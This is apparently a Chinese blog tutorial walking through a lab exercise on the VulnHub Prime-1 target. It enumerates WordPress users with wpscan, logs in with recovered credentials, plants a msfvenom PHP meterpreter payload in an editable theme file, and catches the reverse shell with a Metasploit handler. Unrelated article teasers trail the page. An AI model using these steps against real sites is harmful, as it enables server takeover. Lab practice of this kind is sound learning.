news 2026/3/21 1:00:59

kali反弹连接wordpress靶场详细教程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
kali反弹连接wordpress靶场详细教程

前言

本次实战通过prime靶场进行操作,从寻找测试点和getshell,对各项步骤进行详细记录,以方便参考

接上一篇文章https://blog.csdn.net/qq_66136699/article/details/155752517?fromshare=blogdetail&sharetype=blogdetail&sharerId=155752517&sharerefer=PC&sharesource=qq_66136699&sharefrom=from_link

目录

一、反弹连接是什么?

二、使用步骤

1.准备工作

2.实战操作

①登录网站

②指纹识别

③尝试登录​编辑

④寻找上传点

⑥构建shell代码

⑦创建监听通道

⑧反弹shell

总结


一、反弹连接是什么?

简单来说就是黑客控制了目标,并建立了监听的端口,以及构建了一个可以访问的后门,这里的反弹连接是在通过在后台服务端上传木马,当客户端访问带有木马的页面时,攻击机通过监听的端口获取到了系统的shell,获得了执行命令的权限

二、使用步骤

1.准备工作

使用靶场:vulnhub-prime-1

攻击机版本:kali2025.03、

在前面的信息收集环节我们获取到了靶场 wordpress 的账号和密码

url:http://192.168.12.134/wordpress/

密码:follow_the_ippsec

2.实战操作

①登录网站

访问 wordpress 后台的url,并找到 login in 关键词

点击进去发现是一个登录页面

②指纹识别

回到 kali 攻击机对网站做一个指纹识别

wpscan --url http://192.168.12.134/wordpress/ --enumerate u

参数说明:--url 指定识别的网站地址,-enumerate u: 枚举用户名

结果显示发现了一个已注册的用户名

目前掌握的重要信息

账户:victor

密码:follow_the_ippsec

③尝试登录

登录成功!!

④寻找上传点

wordpress有一个功能,可以在系统内部编辑代码,思路是找到其中可以编辑的代码框,并上传带有反弹shell木马的代码,位置以标出

我找到的可编辑文件是 secret.php,

⑥构建shell代码

回到kali,利用 msfvenom构建php反弹连接的代码

输入这一串指令,我的 kali ip地址为:192.168.12.128

构建成功后cat查看代码并复制,开头的 / *就不用了复制了

粘贴到 wordpress 中 secret.php,并上传更新

⑦创建监听通道

回到kali,需要设置一些参数来建立监听连接

msfconsole

使用 msf 控制终端

输入以下参数,确保与 msfvenom 构建的反弹shell的文件参数一致

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.12.128

set lport 7777

⑧反弹shell

exploit 开始监听端口,并等待反弹shell

根据wordpress的项目目录结构,可以确定 secret.php 文件在下面这个位置

为方便学习最好自己搞一套wordpress的源码研究

回车!!再回到 kali 反弹连接 shell 成功。

可以再上面输入一些简单命令,也就是说初步获取到了靶机执行命令权限


总结

本文简单介绍了反弹shell进行连接的使用,使用了msf工具构建了带有木马的shell代码,经过一层层得到信息收集和测试,最终获取到了服务端shell执行命令的权限。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/21 1:00:02

【量子安全时代已来】:MCP SC-400必须掌握的6项核心技能

第一章:量子安全时代下MCP SC-400的使命与定位 随着量子计算技术的突破性进展,传统公钥加密体系面临前所未有的破解风险。在这一背景下,MCP SC-400作为新一代抗量子密码模块,承担起保障关键基础设施通信安全的核心职责。其设计目标…

作者头像 李华
网站建设 2026/3/15 22:24:37

前端岗来了个男生,没两天就被劝退了

招了一个前端岗男生才两天就被劝退了上周团队入职一位前端新人,简历项目丰富,Vue / React/ Vite 样样都会。可一上手真实需求,问题比控制台报错还密集 以下是几个典型沟通还原,建议每位前端都看看怎么“答在点上”。🎯…

作者头像 李华
网站建设 2026/3/15 22:24:30

掌握这3个VSCode技巧,轻松实现量子电路实时渲染与交互

第一章:量子电路的 VSCode 可视化工具在现代量子计算开发中,可视化是理解与调试量子电路的关键环节。借助 Visual Studio Code(VSCode)这一流行代码编辑器,开发者可通过专用插件实现对量子电路的实时图形化展示&#x…

作者头像 李华
网站建设 2026/3/16 1:36:45

【必学收藏】大模型RAG技术全解析:从零开始掌握AI产品核心技能

本文详解RAG技术七大核心概念:向量数据库实现语义检索,混合检索提升精确度,分块嵌入优化知识管理,重排序提高内容相关性,上下文融合增强信息连贯性,准确率与召回率平衡检索质量,知识图谱强化实体…

作者头像 李华
网站建设 2026/3/15 1:35:15

游戏三子棋

game.h 文件 #define ROW 3 #define COL 3// 初始化棋盘 void InitBoard(char board[ROW][COL], int row, int col); // 打印棋盘 void DisplayBoard(char board[ROW][COL], int row, int col); // 玩家下棋 void PlayerMove(char board[ROW][COL], int row, int col); // 电脑…

作者头像 李华